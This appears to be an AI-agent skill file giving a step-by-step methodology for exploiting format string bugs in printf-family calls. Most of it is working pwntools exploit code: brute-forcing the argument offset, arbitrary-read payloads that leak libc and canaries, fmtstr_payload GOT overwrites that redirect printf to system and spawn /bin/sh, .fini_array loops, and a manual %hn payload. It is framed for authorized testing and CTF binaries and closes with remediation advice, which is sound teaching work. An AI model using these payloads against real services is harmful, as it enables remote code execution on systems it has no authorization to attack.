exploiting-format-string-vulnerabilities

Name: exploiting-format-string-vulnerabilities
Author: xalgord/xalgorix

$npx mdskill add xalgord/xalgorix/exploiting-format-string-vulnerabilities

- During authorized binary/exploitation assessments when attacker input is passed as the **first argument** (the format) to `printf`, `fprintf`, `sprintf`, `snprintf`, `vprintf`, `syslog`, or similar. - When you need a memory-disclosure primitive to leak stack contents, a libc/PIE pointer, or a stack canary to defeat ASLR/PIE/canary protections. - When you have an arbitrary-write primitive opportunity via `%n`/`%hn` to overwrite a GOT entry, `.fini_array`, a saved return address, or a function pointer. - On Windows x64 services where a buggy `_snprintf(dst, len, attacker_fmt)` call provides no varargs and conversions read pointers out of RCX/RDX/R8/R9 registers.

SKILL.md

.github/skills/exploiting-format-string-vulnerabilitiesView on GitHub ↗

---
name: exploiting-format-string-vulnerabilities
description: Methodology for exploiting format string bugs where attacker-controlled data reaches the format argument of
  printf-family functions, enabling stack/memory disclosure (info leaks for ASLR/PIE/canary defeat) and arbitrary write
  primitives (%n) to hijack control flow via GOT/.fini_array overwrites.
domain: cybersecurity
subdomain: binary-exploitation
tags:
- binary-exploitation
- format-string
- exploit-development
version: '1.0'
author: xalgorix
license: Apache-2.0
---

# Exploiting Format String Vulnerabilities

## When to Use

- During authorized binary/exploitation assessments when attacker input is passed as the **first argument** (the format)
  to `printf`, `fprintf`, `sprintf`, `snprintf`, `vprintf`, `syslog`, or similar.
- When you need a memory-disclosure primitive to leak stack contents, a libc/PIE pointer, or a stack canary to defeat
  ASLR/PIE/canary protections.
- When you have an arbitrary-write primitive opportunity via `%n`/`%hn` to overwrite a GOT entry, `.fini_array`, a saved
  return address, or a function pointer.
- On Windows x64 services where a buggy `_snprintf(dst, len, attacker_fmt)` call provides no varargs and conversions read
  pointers out of RCX/RDX/R8/R9 registers.

## Critical: Concepts/Steps Most Often Missed

- **Put the format specifiers BEFORE the target address, not after.** `printf` stops reading at the first NUL byte. If
  you send `p64(addr) + b"%7$s"`, the address (which contains NUL bytes in its high bytes) terminates the string and the
  specifiers are never processed. Send `b"%7$s" + padding + p64(addr)` instead, and align so the address lands on a
  pointer boundary.
- **Use `%hn` (2 bytes), not `%n` (4 bytes), for full addresses.** Writing a 4-byte value like `0x08049724` in one go
  requires printing billions of characters. Split the write into two `%hn` operations (high and low halves) and emit the
  smaller half-value first.
- **Confirm the offset precisely.** Sending `AAAA%p%p%p...` is not enough; brute-force `AAAA%N$p` until the output shows
  `0x41414141` and verify with `BBBB` that you control a full aligned pointer slot. Off-by-one offset errors silently
  read the wrong slot.
- **`%n` writes are disabled by FORTIFY.** `_FORTIFY_SOURCE` aborts on `%n` in writable format strings; on those targets
  you are limited to read primitives (still enough to leak canary/libc and pair with another bug).
- **Let pwntools do the math.** `fmtstr_payload()` and `FmtStr()` compute the offset and craft the multi-write payload;
  manual HOB/LOB arithmetic is error-prone.

### How to CONFIRM

A read primitive is confirmed when a chosen `%N$p`/`%N$s` returns *attacker-known* data: send `b"AAAA%6$p"` and confirm
`0x41414141` (or `0x...41414141` on 64-bit) appears in the output — that proves your buffer is at stack arg 6. A write
primitive is confirmed by reading back the target: overwrite a GOT entry with a sentinel, then dump it with `%s`/`%p` and
verify the bytes changed, or set a breakpoint in gdb on the write target and observe the value land.

## Workflow

### Step 1: Confirm the Bug and Find the Argument Offset

```python
from pwn import *
context.binary = elf = ELF('./chall', checksec=False)

# Brute-force the stack offset where our input lands
for i in range(1, 50):
    p = process('./chall')
    p.sendline(f"AAAA%{i}$p".encode())
    out = p.clean()
    if b"0x41414141" in out:
        log.success(f"Input is at offset {i}")
        p.close(); break
    p.close()
```

A quick manual probe: `%p %p %p %p %p %p` printed by a `printf(buffer)` reveals stack values; `%x` leaking attacker
bytes proves the format string is attacker-controlled.

### Step 2: Build the Read Primitive (Leak Stack / libc / Canary)

```python
# Read an arbitrary address: format specifier FIRST, address LAST (no early NUL)
payload  = b"%7$s"            # offset 7 holds our address slot
payload += b"|" * (8 - len(b"%7$s"))   # pad so the pointer is 8-aligned
payload += p64(0x404020)      # address to dereference and print as string
p.sendline(payload)
log.info(p.clean())

# Leak a libc pointer from the stack, then compute base
p.sendline(b"%25$p")
leak = int(p.recvline().strip(), 16)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc.address = leak - libc.symbols['__libc_start_main'] - 243
log.info("libc base @ %#x", libc.address)
```

Reads are useful to dump the binary from memory and to grab canaries, encryption keys, or hardcoded passwords stored on
the stack/BSS.

### Step 3: Build the Write Primitive and Hijack Control Flow

```python
# Let pwntools craft the multi-%hn write. Overwrite printf@GOT -> system
payload = fmtstr_payload(offset, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)
# Next call to printf(user_input) now runs system(user_input)
p.sendline(b'/bin/sh')
p.interactive()
```

Manual two-step `%hn` (when not using pwntools), writing high-order then low-order halves with `%.<pad>x%<arg>$hn`:

```bash
# Example: write 0x080497xx split into two 16-bit halves at offsets 4 and 5
python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+"%.49143x"+"%4$hn"+"%.15408x"+"%5$hn"'
```

### Step 4: Make the Bug Reusable / Escalate

```python
# If you need another pass through the vulnerable code, overwrite .fini_array
# to loop back to main, then perform the GOT overwrite on the second pass.
fmt = FmtStr(execute_fmt=send_payload, offset=offset, padlen=padlen)
fmt.write(elf.symbols['__init_array_end'], INIT_LOOP_ADDR)  # loop back
fmt.write(elf.got['printf'], elf.plt['system'])             # then redirect
fmt.execute_writes()
```

On Windows x64, prepend `%p` to leak whatever pointer sits in R9 at the call-site, recover the module base as
`leak - known_offset`, and reuse it to compute gadget/IAT addresses for a ROP chain.

## Key Concepts

| Concept | Description |
|---------|-------------|
| **Format specifier** | `%x`/`%p` read stack words, `%s` dereferences a pointer and prints a string, `%n` writes the byte count to a pointed address. |
| **Direct parameter access** | `%N$x` selects the N-th argument directly (e.g. `%4$p` reads the 4th), avoiding long specifier chains. |
| **Argument offset** | The stack index at which attacker-controlled input appears; the anchor for both read and write primitives. |
| **`%n` / `%hn` / `%hhn`** | Write the number of bytes printed so far into an address: 4 bytes / 2 bytes / 1 byte respectively. |
| **HOB / LOB** | High-order and low-order halves of a target address; written separately with two `%hn` operations. |
| **GOT overwrite** | Replacing a GOT entry (e.g. `printf`) with another function (e.g. `system`) so the next call is redirected. |
| **`.fini_array` loop** | Overwriting a destructor pointer to re-enter `main`, giving extra exploitation passes. |
| **Width padding** | `%.<num>d` prints `num` characters cheaply so `%n` writes a large value without huge buffers. |

## Tools & Systems

| Tool | Purpose |
|------|---------|
| **pwntools** | `fmtstr_payload`, `FmtStr`, `ELF.got`/`ELF.plt`/`ELF.symbols`, process/remote IO, automated offset detection. |
| **gdb + pwndbg/GEF** | Inspect the stack at the `printf` call, confirm writes landed, set breakpoints on GOT targets. |
| **checksec** | Detect RELRO (full RELRO makes GOT read-only), FORTIFY (`%n` blocked), PIE, canary. |
| **objdump / readelf** | Enumerate GOT/PLT entries and `.fini_array`/`.init_array` addresses. |
| **radare2 / Ghidra** | Reverse the call-site to confirm the format argument is attacker-controlled and find static offsets (Windows base recovery). |
| **one_gadget** | After a libc leak, find a single-shot shell gadget to target with the write. |

## Common Scenarios

### Scenario 1: Stack secret leak (no flow control needed)
`printf(buffer)` echoes user input. Brute-forcing `%N$s` reveals a hardcoded password stored on the stack at offset 10,
or `%N$p` leaks a heap/libc address — enough to win without altering execution.

### Scenario 2: GOT overwrite to system
A 32-bit no-RELRO binary calls `printf(user)` in a loop. `fmtstr_payload(5, {got['printf']: libc.sym['system']})`
redirects `printf` to `system`; the next iteration with input `/bin/sh` spawns a shell.

### Scenario 3: ret2win via .fini_array + GOT
A binary with a one-shot format string overwrites `.fini_array` to loop back to `main`, then on the second pass writes
the `win`/`system` address into a GOT slot used right after.

### Scenario 4: Windows x64 ASLR defeat
A service does `_snprintf(dst, 0xff2, keyData)` with no varargs. A leading `%p` prints the value in R9 — a stable
in-module pointer — letting the attacker compute the image base and bootstrap a ROP chain.

## Output Format

```
## Format String Finding

**Vulnerability**: Uncontrolled format string (CWE-134)
**Severity**: Critical (arbitrary read+write -> RCE) / High (info leak only)
**Binary**: ./chall (x86-64, Partial RELRO, No PIE, No FORTIFY)
**Call site**: printf(user_input) in handle_request()

### Primitive Confirmation
- Read: input at stack offset 6 (AAAA%6$p -> 0x...41414141)
- Leak: libc base @ 0x7ffff7da5000 via %25$p
- Write: %hn enabled (no FORTIFY), Partial RELRO -> GOT writable

### Exploitation
fmtstr_payload(6, {got['printf']: libc.sym['system']})
Result: printf("/bin/sh") executed system("/bin/sh") -> shell as service user.

### Impact
Arbitrary memory read/write leading to remote code execution.

### Recommendation
1. Never pass user input as the format argument: use printf("%s", user_input).
2. Compile with -Wformat -Wformat-security -Werror=format-security and _FORTIFY_SOURCE=2.
3. Enable Full RELRO (-Wl,-z,relro,-z,now) to make the GOT read-only.
4. Enable PIE/ASLR and stack canaries.
```

More from xalgord/xalgorix

Skill	Description
abusing-hop-by-hop-headers	Testing proxies, load balancers, and CDNs for improper handling of HTTP hop-by-hop headers, where an
analyzing-macos-persistence-and-autostart	Enumerating, planting, and hunting macOS persistence and auto-start (ASEP) locations during authorized
api-discovery	API endpoint discovery including OpenAPI/Swagger detection, hidden versioning, REST/GraphQL enumeration, and content negotiation
bypassing-binary-exploitation-mitigations	Methodology for identifying and defeating common binary hardening mitigations during authorized exploitation —
bypassing-captcha-protections	Identifying weaknesses in CAPTCHA implementations and bypassing them via replay, field removal,
bypassing-macos-gatekeeper-tcc-and-sip	Assessing and bypassing macOS userland and platform security controls during authorized engagements -
bypassing-restricted-shells	Escaping restricted shells (rbash, rksh, lshell), chroot jails, and language sandboxes (Lua, Python)
bypassing-two-factor-and-otp	Identifying and exploiting flaws in two-factor authentication and one-time password verification
deep	Exhaustive security assessment with maximum coverage, depth, and vulnerability chaining
exploiting-ai-model-file-rce	Testing machine-learning model files and model-loading services for remote code execution caused by insecure